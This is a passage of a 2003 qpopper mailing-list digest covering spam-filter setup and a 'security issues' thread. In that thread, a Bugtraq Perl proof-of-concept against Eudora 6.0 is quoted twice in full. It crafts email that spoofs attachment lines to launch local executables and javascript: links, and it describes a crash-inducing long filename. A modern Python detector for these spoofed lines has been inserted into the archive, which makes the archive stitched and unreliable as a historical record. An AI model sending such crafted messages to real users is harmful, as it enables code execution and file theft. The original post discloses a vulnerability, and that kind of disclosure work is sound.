The qpopper list archive ending on 23 Sep 2003
Topics covered in this issue include:
1. Spam question
"Dan Lee" <dlee at appcim dot com>
Mon, 15 Sep 2003 09:59:10 -0500
2. RE: Spam question
"Matthew Thomas" <mthomas at biocontrolsys dot com>
Mon, 15 Sep 2003 08:11:07 -0700
3. Re: Spam question
"Ken Hohhof" <ken at mixedsignal dot com>
Mon, 15 Sep 2003 09:48:54 -0500
4. security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 11:50:25 -0400
5. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 08:30:53 -0700
6. Re: security issues
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 12:34:37 -0400
7. Re: security issues
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 13:21:09 -0400 (EDT)
8. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 13:17:48 -0400 (EDT)
9. Re: Spam question
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 12:51:01 -0400
10. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 10:54:03 -0700
11. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 10:57:55 -0700
12. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 14:24:52 -0400
13. Re: Spam question
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 14:41:53 -0400
14. Re: Spam question
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 15 Sep 2003 16:58:24 -0400
15. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 17:07:42 -0400
16. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:56:48 -0400 (EDT)
17. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 16:11:05 -0400
18. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:38:31 -0400 (EDT)
19. Re: security issues
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 15 Sep 2003 17:01:23 -0400
20. Re: security issues
Clifton Royston <cliftonr at lava dot net>
Mon, 15 Sep 2003 10:04:04 -1000
21. Re: Spam question
Kenneth Porter <shiva at sewingwitch dot com>
Mon, 15 Sep 2003 23:09:40 -0700
22. Re: security issues
Kenneth Porter <shiva at sewingwitch dot com>
Mon, 15 Sep 2003 23:15:55 -0700
23. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:54:21 -0400 (EDT)
24. Re: Spam question
Alan Brown <alanb at digistar dot com>
Tue, 16 Sep 2003 06:23:04 -0400 (EDT)
25. Re: Spam question
Ken Anderson <ka at pacific dot net>
Tue, 16 Sep 2003 07:39:12 -0700
26. problems with patch and mysql
joe ritter <glestadt4 at yahoo dot com>
Fri, 19 Sep 2003 09:17:42 -0700 (PDT)
27. Interested in writing QPopper patch
"Alan W. Rateliff, II" <lists at rateliff dot net>
Fri, 19 Sep 2003 19:41:48 -0400
28. Re: Interested in writing QPopper patch
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Fri, 19 Sep 2003 21:02:40 -0400
29. Re: Spam question
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Fri, 19 Sep 2003 21:04:19 -0400
30. Re: Interested in writing QPopper patch
"Alan W. Rateliff, II" <lists at rateliff dot net>
Sat, 20 Sep 2003 01:11:23 -0400
31. How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Sat, 20 Sep 2003 15:14:23 +1000
32. Re: Interested in writing QPopper patch
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Sat, 20 Sep 2003 13:44:38 -0400
33. Re: How to setup multiple domain pop server
Robert Brandtjen <rob at prometheusmedia dot com>
20 Sep 2003 18:34:12 -0500
34. Re: How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Sun, 21 Sep 2003 11:05:25 +1000
35. Re: How to setup multiple domain pop server
"Lisa Casey" <lisa at jellico dot net>
Sat, 20 Sep 2003 22:17:33 -0400
36. Re: How to setup multiple domain pop server
Joe Maimon <jmaimon at ttec dot com>
Sat, 20 Sep 2003 23:45:22 -0400
37. Re: How to setup multiple domain pop server
Richard Gration <richard at zync.co dot uk>
Sun, 21 Sep 2003 12:56:21 +0100
38. Re: How to setup multiple domain pop server
Alan Brown <alanb at digistar dot com>
Sun, 21 Sep 2003 08:17:45 -0400 (EDT)
39. Re: How to setup multiple domain pop server
Richard Gration <richard at zync.co dot uk>
Sun, 21 Sep 2003 13:39:53 +0100
40. Re: How to setup multiple domain pop server
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sun, 21 Sep 2003 09:12:47 -0700 (PDT)
41. QPOP/SSL vs Outlook Express
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 16:06:17 -0400
42. Re: QPOP/SSL vs Outlook Express
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 17:07:57 -0400
43. Re: How to setup multiple domain pop server
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 22 Sep 2003 17:44:25 -0400
44. SSL CA Certificate problem
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 17:47:54 -0400
45. Re: How to setup multiple domain pop server
Alan Brown <alanb at digistar dot com>
Mon, 22 Sep 2003 18:16:54 -0400 (EDT)
46. SSL help, Qpopper and Sendmail
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 23:06:44 -0400
47. Re: How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Tue, 23 Sep 2003 19:10:37 +1000
48. .lock files and quotas
"Chris Szilagyi" <chris at apex-internet dot com>
Tue, 23 Sep 2003 14:52:53 -0000
49. Re: .lock files and quotas
"Chris Szilagyi" <chris at apex-internet dot com>
Tue, 23 Sep 2003 17:55:31 -0000
50. Re: SSL help, Qpopper and Sendmail
Kenneth Porter <shiva at sewingwitch dot com>
Tue, 23 Sep 2003 14:32:44 -0700
Subject: Spam question
Date: Mon, 15 Sep 2003 09:59:10 -0500
From: "Dan Lee" <dlee at appcim dot com>
Hi Everyone,
Was hoping someone might be able to give me some insight into a spam
blocking application that works with qpopper. I'm running qpopper for
my pop server on a freebsd box. I've got about 10 users on this box and
been getting complaints about spam. Has anyone installed spamassassin?
Do I need procmail? Is there a more appropriate spam blocking utility?
I'm really new to the list and any advice on/off list would be hugely
appreciated.
Thanks,
Dan
From: "Matthew Thomas" <mthomas at biocontrolsys dot com>
Subject: RE: Spam question
Date: Mon, 15 Sep 2003 08:11:07 -0700
Dan,
I use sendmail/qpopper/MIMEDefang/spamassassin. It works very well for me.
There is a bit of a howto located at
http://www.rudolphtire.com/mimedefang-howto for this configuration.
Spamassassin and MIMEDefang both have very active mailing lists. In that
configuration, Sendmail calls MIMEDefang and MIMEDefang calls spamassassin.
Qpopper just does its normal thing. MIMEDefang was a lifesaver when we
decided to just drop the thousands of sobig emails we were receiving.
Spamassassin catches over 99% of the incoming spam we receive.
Regards,
Matt Thomas
> -----Original Message-----
> From: Dan Lee [mailto:dlee at appcim dot com]
> Sent: Monday, September 15, 2003 7:59 AM
> To: Subscribers of Qpopper
> Subject: Spam question
>
>
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into
> a spam blocking application that works with qpopper. I'm
> running qpopper for my pop server on a freebsd box. I've got
> about 10 users on this box and been getting complaints about
> spam. Has anyone installed spamassassin? Do I need procmail?
> Is there a more appropriate spam blocking utility? I'm
> really new to the list and any advice on/off list would be
> hugely appreciated.
>
> Thanks,
> Dan
>
From: "Ken Hohhof" <ken at mixedsignal dot com>
Subject: Re: Spam question
Date: Mon, 15 Sep 2003 09:48:54 -0500
I think spam blockers work with the MTA that delivers the mail to mailboxes
(e.g. sendmail), not with the POP3 server. Once the junk is in the user's
mailspool, it's a little late to block it.
----- Original Message -----
From: "Dan Lee" <dlee at appcim dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Monday, September 15, 2003 9:59 AM
Subject: Spam question
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into a spam
> blocking application that works with qpopper. I'm running qpopper for
> my pop server on a freebsd box. I've got about 10 users on this box and
> been getting complaints about spam. Has anyone installed spamassassin?
> Do I need procmail? Is there a more appropriate spam blocking utility?
> I'm really new to the list and any advice on/off list would be hugely
> appreciated.
>
> Thanks,
> Dan
>
Date: Mon, 15 Sep 2003 11:50:25 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: security issues
I know this is the qpopper list, but can anyone from qualcomm comment on
the security issues for Eudora ? I find it rather distressing that several
known holes would be seemingly left unaddressed for so long. Perhaps the
qualcomm people here can respond on bugtraq where the posting below was made.
---Mike
-------------------------------
>Eudora 6.0 was released recently; I tested the Windows version only.
>It still contains several vulnerabilities, the most serious being an
>execute-any-code bug. It is distressing that the "spoof and steal" bug
>was pointed out years ago; the execute-any-code bug in 5.2.1 was sent
>to Qualcomm on 29 May 2003.
>
>Cheers,
>
>Paul Szabo - psz at maths.usyd.edu.au http://www.maths.usyd.edu dot au:8000/u/psz/
>School of Mathematics and Statistics University of Sydney 2006 Australia
>
>---
>
>#!/usr/bin/perl --
>
>use MIME::Base64;
>
>print "From: me\n";
>print "To: you\n";
>print "Subject: Eudora 6.0 on Windows exploit\n";
>print "MIME-Version: 1.0\n";
>print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
>print "\n";
>print "This is a multi-part message in MIME format.\n";
>print "--zzz\n";
>print "Content-Type: text/plain\n";
>print "Content-Transfer-Encoding: 7bit\n";
>print "\n";
>
>print "Pipe the output of this script into: sendmail -i victim\n";
>
>print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
>In.mbx.002 files. Any way to turn this wasteful feature off?\n";
>
>print "\nWith spoofed attachments, we could 'steal' files if the message
>was forwarded (not replied to).\n";
>
>print "\nSending a long filename e.g.:\n";
>print "Attachment Converted\r: \"\\AAA...AAA\"\n";
>print "(with 250 or so repetitions of \"A\") makes Eudora crash.
>Eudora is then unable to start, until the offending message is
>removed from In.mbx (using some utility other than Eudora itself).
>This buffer overflow can easily be made into an execute-any-code
>exploit (but is not shown here for script kiddies).\n";
>
>print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
>CR=x0d characters get converted internally into a NUL=x00 and ignored,
>so we can spoof \"attachment converted\" lines:\n";
>
>print "\nThe following work fine (but are boring and/or put up warnings):\n";
>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
>print "(Note how JavaScript is done with IE, web with default browser
>Netscape)\n";
>print "Attachment Converted\r: <A
>href=javascript:alert(%27hello%27)>hello.txt</a>\n";
>print "Attachment Converted\r: <A
>href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
>print "Attachment Converted\r: <A
>href=c:/winnt/system32/calc.exe>file.txt</a>\n";
>
>print "\nIf we can guess the full path to the attach directory then can
>change the name shown to anything we like, but get broken icon:\n";
>print "Attachment Converted\r: <A
>href=H:/windows/.eudora/attach/calc>file.txt</a>\n";
>
>print "\nCuteness value only:\n";
>print "Attachment Converted\r: <A
>href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A
>href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
>
>print "\n<x-html>
>With <b>HTML</b> <i>inclusions</i> we can do
><a href=c:/winnt/system32/calc.exe>file</a>,
><a
>href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
>and
><a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
>references. Any way to exploit this?
></x-html>\n";
>
>print "\n<x-rich>
>Can also do RTF inclusions. Can this be abused?
>\n";
>
>print "\nThose <x-xyz></x-xyz> constructs allow spoofing
>attachments easily, without embedded CR:\n\n";
>print "HTML\n";
>print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
>print "Rich\n";
>print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
>print "Flowed\n";
>print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
>
>print "\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"plain.txt\"\n";
>print "Content-Transfer-Encoding: 7bit\n";
>print "Content-Disposition: inline; filename=\"plain.txt\"\n";
>print "\n";
>print "Within a 'plain' attachment:\n";
>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"qp.txt\"\n";
>print "Content-Transfer-Encoding: quoted-printable \n";
>print "Content-Disposition: inline; filename=\"qp.txt\"\n";
>print "\n";
>print "Within quoted-printable encoded parts still need the embedded CR:\n";
>print "=41ttachment =43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"b64.txt\"\n";
>print "Content-Transfer-Encoding: base64\n";
>print "Content-Disposition: inline; filename=\"b64.txt\"\n";
>print "\n";
>$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
>without embedded CR (but line termination is CR-NL):\r
>#Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
>print encode_base64($z);
>
>print "\n--zzz--\n";
>print "\n";
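A gateway-side check for the spoofed "Attachment Converted" lines described in the quoted advisory, as an added example that is not part of the original post or of any Qualcomm, MIMEDefang or SpamAssassin code. The function names, the placeholder path and the sample message are constructed for illustration, and the check assumes that no legitimate inbound mail starts a body line with that marker.

```python
import base64
import re
from email import message_from_bytes

# Empty Eudora-style tag pairs (<x-html></x-html>, <x-rich></x-rich>, ...) that
# the advisory shows being placed directly in front of a spoofed line.
EMPTY_X_TAGS = re.compile(r"^(?:<x-[a-z]+>\s*</x-[a-z]+>)+", re.IGNORECASE)
MARKER = re.compile(r"^Attachment Converted\s*:", re.IGNORECASE)


def scan_text(text):
    """Return (line_number, technique) for each spoofed marker line in text."""
    findings = []
    # CRLF is an ordinary line ending; any CR left after this is "embedded".
    lines = text.replace("\r\n", "\n").split("\n")
    for number, line in enumerate(lines, start=1):
        has_ctl = "\r" in line or "\x00" in line
        # Mirror what the advisory describes: CR becomes NUL and is ignored.
        visible = line.replace("\r", "").replace("\x00", "")
        stripped = EMPTY_X_TAGS.sub("", visible)
        if not MARKER.match(stripped):
            continue
        if has_ctl:
            technique = "embedded-cr"
        elif stripped != visible:
            technique = "x-tag-prefix"
        else:
            technique = "line-start"
        findings.append((number, technique))
    return findings


def scan_message(raw):
    """Decode every text part (7bit, quoted-printable, base64) and scan it."""
    msg = message_from_bytes(raw)
    results = []
    index = 0
    for part in msg.walk():
        if part.is_multipart() or part.get_content_maintype() != "text":
            continue
        index += 1
        # decode=True undoes the Content-Transfer-Encoding, so encoded
        # variants are checked in the form the mail client would see.
        payload = part.get_payload(decode=True) or b""
        cte = (part.get("Content-Transfer-Encoding") or "7bit").strip().lower()
        for line_no, technique in scan_text(payload.decode("latin-1")):
            results.append({"part": index, "encoding": cte,
                            "line": line_no, "technique": technique})
    return results


def build_sample():
    """Constructed sample message; the path is a placeholder, not a real file."""
    path = b'"C:\\placeholder\\file.txt"'
    b64_body = base64.encodebytes(
        b"A note.\r\nAttachment Converted: " + path + b"\r\n")
    return b"".join([
        b"From: sender@example.com\n",
        b"To: rcpt@example.com\n",
        b"Subject: constructed sample\n",
        b"MIME-Version: 1.0\n",
        b'Content-Type: multipart/mixed; boundary="zzz"\n',
        b"\n",
        b"--zzz\n",
        b"Content-Type: text/plain\n",
        b"Content-Transfer-Encoding: 7bit\n",
        b"\n",
        b"Hello, see the notes.\n",
        b"Attachment Converted\r: " + path + b"\n",
        b"--zzz\n",
        b'Content-Type: text/plain; name="qp.txt"\n',
        b"Content-Transfer-Encoding: quoted-printable\n",
        b"\n",
        b"=41ttachment =43onverted\r=3a " + path + b"\n",
        b"--zzz\n",
        b'Content-Type: text/plain; name="b64.txt"\n',
        b"Content-Transfer-Encoding: base64\n",
        b"\n",
        b64_body,
        b"--zzz\n",
        b"Content-Type: text/plain\n",
        b"\n",
        b'<x-html></x-html>Attachment Converted: "xyz"\n',
        b"This sentence mentions Attachment Converted: in passing.\n",
        b"--zzz--\n",
    ])


if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

A filter that calls scan_message at SMTP time can reject or tag the message before it reaches the POP3 spool; a mention of the marker in the middle of a sentence is not flagged.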
Date: Mon, 15 Sep 2003 08:30:53 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
There's a proxy server that supports pop3 called prometo on sourceforge
that recently added SA support. I've tested it with qpopper, and it
works good with SA, but there's no way to do per user rules. Pretty cool
to do this on the pop3 side tho.
Normally, SA is installed as a milter in sendmail or with another MTA.
Ken A.
Dan Lee wrote:
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into a spam
> blocking application that works with qpopper. I'm running qpopper for
> my pop server on a freebsd box. I've got about 10 users on this box and
> been getting complaints about spam. Has anyone installed spamassassin?
> Do I need procmail? Is there a more appropriate spam blocking utility?
> I'm really new to the list and any advice on/off list would be hugely
> appreciated.
>
> Thanks,
> Dan
>
>
Date: Mon, 15 Sep 2003 12:34:37 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: security issues
At 11:50 AM 9/15/2003, Mike Tancsa wrote:
>I know this is the qpopper list, but can anyone from qualcomm comment on
>the security issues for Eudora ? I find it rather distressing that
>several known holes would be seemingly left unaddressed for so
>long. Perhaps the qualcomm people here can respond on bugtraq where the
>posting below was made.
This really isn't the right list. I'm getting the distinct impression the
engineers working on Eudora are spending their time on neat new features
(spam filtering, etc.) at the expense of bug fixes. I've submitted several
bug reports dating back two years and find that with each new release, none
have been addressed.
I'm starting to think about re-evaluating my recommendation to clients that
they use Eudora, just because the product is seemingly unsupported.
> ---Mike
>
>-------------------------------
>>Eudora 6.0 was released recently; I tested the Windows version only.
>>It still contains several vulnerabilities, the most serious being an
>>execute-any-code bug. It is distressing that the "spoof and steal" bug
>>was pointed out years ago; the execute-any-code bug in 5.2.1 was sent
>>to Qualcomm on 29 May 2003.
>>
>>Cheers,
>>
>>Paul Szabo - psz at maths.usyd.edu.au http://www.maths.usyd.edu dot au:8000/u/psz/
>>School of Mathematics and Statistics University of Sydney 2006 Australia
>>
>>---
>>
>>#!/usr/bin/perl --
>>
>>use MIME::Base64;
>>
>>print "From: me\n";
>>print "To: you\n";
>>print "Subject: Eudora 6.0 on Windows exploit\n";
>>print "MIME-Version: 1.0\n";
>>print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
>>print "\n";
>>print "This is a multi-part message in MIME format.\n";
>>print "--zzz\n";
>>print "Content-Type: text/plain\n";
>>print "Content-Transfer-Encoding: 7bit\n";
>>print "\n";
>>
>>print "Pipe the output of this script into: sendmail -i victim\n";
>>
>>print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
>>In.mbx.002 files. Any way to turn this wasteful feature off?\n";
>>
>>print "\nWith spoofed attachments, we could 'steal' files if the message
>>was forwarded (not replied to).\n";
>>
>>print "\nSending a long filename e.g.:\n";
>>print "Attachment Converted\r: \"\\AAA...AAA\"\n";
>>print "(with 250 or so repetitions of \"A\") makes Eudora crash.
>>Eudora is then unable to start, until the offending message is
>>removed from In.mbx (using some utility other than Eudora itself).
>>This buffer overflow can easily be made into an execute-any-code
>>exploit (but is not shown here for script kiddies).\n";
>>
>>print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
>>CR=x0d characters get converted internally into a NUL=x00 and ignored,
>>so we can spoof \"attachment converted\" lines:\n";
>>
>>print "\nThe following work fine (but are boring and/or put up warnings):\n";
>>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>>print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
>>print "(Note how JavaScript is done with IE, web with default browser
>>Netscape)\n";
>>print "Attachment Converted\r: <A
>>href=javascript:alert(%27hello%27)>hello.txt</a>\n";
>>print "Attachment Converted\r: <A
>>href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
>>print "Attachment Converted\r: <A
>>href=c:/winnt/system32/calc.exe>file.txt</a>\n";
>>
>>print "\nIf we can guess the full path to the attach directory then can
>>change the name shown to anything we like, but get broken icon:\n";
>>print "Attachment Converted\r: <A
>>href=H:/windows/.eudora/attach/calc>file.txt</a>\n";
>>
>>print "\nCuteness value only:\n";
>>print "Attachment Converted\r: <A
>>href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A
>>href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
>>
>>print "\n<x-html>
>>With <b>HTML</b> <i>inclusions</i> we can do
>><a href=c:/winnt/system32/calc.exe>file</a>,
>><a
>>href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
>>and
>><a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
>>references. Any way to exploit this?
>></x-html>\n";
>>
>>print "\n<x-rich>
>>Can also do RTF inclusions. Can this be abused?
>>\n";
>>
>>print "\nThose <x-xyz></x-xyz> constructs allow spoofing
>>attachments easily, without embedded CR:\n\n";
>>print "HTML\n";
>>print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
>>print "Rich\n";
>>print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
>>print "Flowed\n";
>>print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
>>
>>print "\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"plain.txt\"\n";
>>print "Content-Transfer-Encoding: 7bit\n";
>>print "Content-Disposition: inline; filename=\"plain.txt\"\n";
>>print "\n";
>>print "Within a 'plain' attachment:\n";
>>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"qp.txt\"\n";
>>print "Content-Transfer-Encoding: quoted-printable \n";
>>print "Content-Disposition: inline; filename=\"qp.txt\"\n";
>>print "\n";
>>print "Within quoted-printable encoded parts still need the embedded CR:\n";
>>print "=41ttachment =43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"b64.txt\"\n";
>>print "Content-Transfer-Encoding: base64\n";
>>print "Content-Disposition: inline; filename=\"b64.txt\"\n";
>>print "\n";
>>$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
>>without embedded CR (but line termination is CR-NL):\r
>>#Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
>>print encode_base64($z);
>>
>>print "\n--zzz--\n";
>>print "\n";
Date: Mon, 15 Sep 2003 13:21:09 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: security issues
On Mon, 15 Sep 2003, Daniel Senie wrote:
> I'm starting to think about re-evaluating my recommendation to clients that
> they use Eudora, just because the product is seemingly unsupported.
Pegasus is almost the same in terms of ease of use, with a slightly
different GUI and enhanced core feature set (but it won't follow html
webbugs, etc - this is a big plus)
Eudora itself succumbed to creeping bloatitus a long time ago. It's a
pity, because it used to be a small, fast, tightly engineered mail client.
Date: Mon, 15 Sep 2003 13:17:48 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Ken Anderson wrote:
> There's a proxy server that supports pop3 called prometo on sourceforge
> that recently added SA support. I've tested it with qpopper, and it
> works good with SA, but there's no way to do per user rules. Pretty cool
> to do this on the pop3 side tho.
All of these are still automated forms of JHD (Just Hit Delete)
There is a _LOT_ of collateral damage from the practice of JHD.
Genuine messages ("False positives") rejected by spam filters at MTA
level result in reject messages arriving back at the original
(non-forged) sender address, so they at least know something went wrong.
Any form of delete filtering after the message hits a user's inbox
means that False Positives are silently dumped.
I've just been through this problem at $orkplace with a vendor's support
mailbox silently trashing our mail, resulting in near-cancellation of a
$100,000 contract. If their spam filters had been rejecting our messages
we'd at least have known to phone them, instead of assuming we were
being ignored.
Anyone doing MUA-level or POP3/IMAP-server-level filtering-by-deletion
does so at their own peril. This is something which is best done in the
SMTP handshake (it's trivial to reject messages after DATA and before
the end-of-conversation.)
Date: Mon, 15 Sep 2003 12:51:01 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: Spam question
At 11:30 AM 9/15/2003, Ken Anderson wrote:
>There's a proxy server that supports pop3 called prometo on sourceforge
>that recently added SA support. I've tested it with qpopper, and it works
>good with SA, but there's no way to do per user rules. Pretty cool to do
>this on the pop3 side tho.
>
>Normally, SA is installed as a milter in sendmail or with another MTA.
We use procmail to deliver to users' mailboxes, and run spamassassin from
there. As a result, we can enable/disable on a per user basis. Allowing
users control is still an issue, though.
Date: Mon, 15 Sep 2003 10:54:03 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
Using SpamAssassin doesn't necessarily mean you are deleting mail.
Any filter must be set up correctly by the sysadmin. Setting up any
filter incorrectly or too restrictively will cause problems for
customers like those you describe.
Ken A.
Alan Brown wrote:
> On Mon, 15 Sep 2003, Ken Anderson wrote:
>
>
>>There's a proxy server that supports pop3 called prometo on sourceforge
>>that recently added SA support. I've tested it with qpopper, and it
>>works good with SA, but there's no way to do per user rules. Pretty cool
>>to do this on the pop3 side tho.
>
>
> All of these are still automated forms of JHD (Just Hit Delete)
>
> There is a _LOT_ of collateral damage from the practice of JHD.
>
>
> Genuine messages ("False positives") rejected by spam filters at MTA
> level result in reject messages arriving back at the original
> (non-forged) sender address, so they at least know something went wrong.
>
>
> Any form of delete filtering after the message hits a user's inbox
> means that False Positives are silently dumped.
>
>
> I've just been through this problem at $orkplace with a vendor's support
> mailbox silently trashing our mail, resulting in near-cancellation of a
> $100,000 contract. If their spam filters had been rejecting our messages
> we'd at least have known to phone them, instead of assuming we were
> being ignored.
>
>
>
> Anyone doing MUA-level or POP3/IMAP-server-level filtering-by-deletion
> does so at their own peril. This is something which is best done in the
> SMTP handshake (it's trivial to reject messages after DATA and before
> the end-of-conversation.)
>
>
>
>
>
Date: Mon, 15 Sep 2003 10:57:55 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
We use MailScanner/SA with sendmail and limited per user rules.
It works good, but users are not so bright, and as you suggest, there's
no cure for that problem.
Ken
Daniel Senie wrote:
> At 11:30 AM 9/15/2003, Ken Anderson wrote:
>
>> There's a proxy server that supports pop3 called prometo on
>> sourceforge that recently added SA support. I've tested it with
>> qpopper, and it works good with SA, but there's no way to do per user
>> rules. Pretty cool to do this on the pop3 side tho.
>>
>> Normally, SA is installed as a milter in sendmail or with another MTA.
>
>
> We use procmail to deliver to users' mailboxes, and run spamassassin
> from there. As a result, we can enable/disable on a per user basis.
> Allowing users control is still an issue, though.
>
>
Date: Mon, 15 Sep 2003 14:24:52 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
At 12:34 PM 15/09/2003, Daniel Senie wrote:
>At 11:50 AM 9/15/2003, Mike Tancsa wrote:
>
>
>>I know this is the qpopper list, but can anyone from qualcomm comment on
>>the security issues for Eudora ? I find it rather distressing that
>>several known holes would be seemingly left unaddressed for so
>>long. Perhaps the qualcomm people here can respond on bugtraq where the
>>posting below was made.
>
>This really isn't the right list. I'm getting the distinct impression the
I realize that, but I am getting concerned that after a year of no response
on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
don't care ? Are not given the resources to care ? Don't understand ? It
would be nice if they said something.
---Mike
Date: Mon, 15 Sep 2003 14:41:53 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: Spam question
At 02:38 PM 9/15/2003, Alan Brown wrote:
>On Mon, 15 Sep 2003, Daniel Senie wrote:
>
> > We use procmail to deliver to users' mailboxes, and run spamassassin from
> > there. As a result, we can enable/disable on a per user basis. Allowing
> > users control is still an issue, though.
>
>If you can't run milters, consider Messagewall as a prophylactic
>frontend to your mailserver.
We can run milters. In this case we don't want to do so. By running SA from
procmail, we can enable it for those users who want it, and not for those
who don't. There are no circumstances under which I'd run a proxy product,
as it would seriously interfere with routine operations.
I was offering the method we use as an example to Ken of other ways to
approach this issue. We're happy with our approach. It fits our needs, and
our customers' very well.
Dan
Date: Mon, 15 Sep 2003 16:58:24 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Spam question
We filter in the MTA (a milter) to spam assassin.
Scores > 15 get dumped (highest false pos was 9.something
in the 2 month pilot). We'll likely move that score to
10. Score > 5.0 gets MARKED (and the mail system moves
it into a "quarantine" folder where 99% is spam but the
occasional real message makes it if really badly composed).
Almost always some kind of bulk mail - lists, stuff with lots
of HTML with weird headers (bad message-ids, etc).
The number of "real mail" that marks false positive is pretty
small. Damn close to zero for folks using plain text (old tyme
unix folks).
Milter catches mail during SMTP so we don't have to bounce stuff
either.
60% of mail is spam here. Lopping off 1/3 of all mail and marking
another 1/3rd is a win. (I'm tempted to turn it off 1 day a month
to remind people).
Quoting Ken Anderson (ka at pacific dot net):
> We use MailScanner/SA with sendmail and limited per user rules.
> It works good, but users are not so bright, and as you suggest, there's
> no cure for that problem.
> Ken
>
>
> Daniel Senie wrote:
>
> >At 11:30 AM 9/15/2003, Ken Anderson wrote:
> >
> >>There's a proxy server that supports pop3 called prometo on
> >>sourceforge that recently added SA support. I've tested it with
> >>qpopper, and it works good with SA, but there's no way to do per user
> >>rules. Pretty cool to do this on the pop3 side tho.
> >>
> >>Normally, SA is installed as a milter in sendmail or with another MTA.
> >
> >
> >We use procmail to deliver to users' mailboxes, and run spamassassin
> >from there. As a result, we can enable/disable on a per user basis.
